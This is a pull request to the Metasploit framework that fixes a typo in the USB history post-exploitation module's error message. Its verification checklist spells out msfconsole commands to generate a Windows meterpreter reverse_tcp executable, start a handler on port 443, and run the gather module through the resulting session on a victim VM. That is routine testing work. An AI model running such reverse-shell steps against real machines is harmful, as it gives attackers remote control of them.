### PR TITLE
Fix typo in USB error message

### DIFF
--- a/modules/post/windows/gather/usb_history.rb
+++ b/modules/post/windows/gather/usb_history.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Post
         print_status(info_hash_to_str(out, v))
       end
     else
-      print_error("No USB devices appear to have been connected to theis host.")
+      print_error("No USB devices appear to have been connected to this host.")
     end
   end
 


### PR DESCRIPTION
There is a typo in the error message for the USB history module.
## Verification

List the steps needed to make sure this thing works
- [ ] Prepare a Windows victim (VM) that has never had a USB device attached
- [ ] Start `msfconsole`
- [ ] `use payload/windows/meterpreter/reverse_tcp`
- [ ] `set LHOST <your IP>`
- [ ] `set LPORT 443`
- [ ] `generate -t exe -f /tmp/meterpreter.exe`
- [ ] `use exploit/multi/handler`
- [ ] `set PAYLOAD windows/meterpreter/reverse_tcp`
- [ ] `set LHOST <your IP>`
- [ ] `set LPORT 443`
- [ ] `set ExitOnSession false`
- [ ] `exploit -j -z`
- [ ] Download and run meterpreter.exe on the Windows victim
- [ ] `sessions -l`
- [ ] `sessions -i <exploit session number>`
- [ ] `background`
- [ ] `use post/windows/gather/usb_history`
- [ ] `set SESSION <exploit session number>`
- [ ] `run`
- [ ] **Verify** the error message is "No USB devices appear to have been connected to this host."
- [ ] **Verify** the error message is not "No USB devices appear to have been connected to theis host."
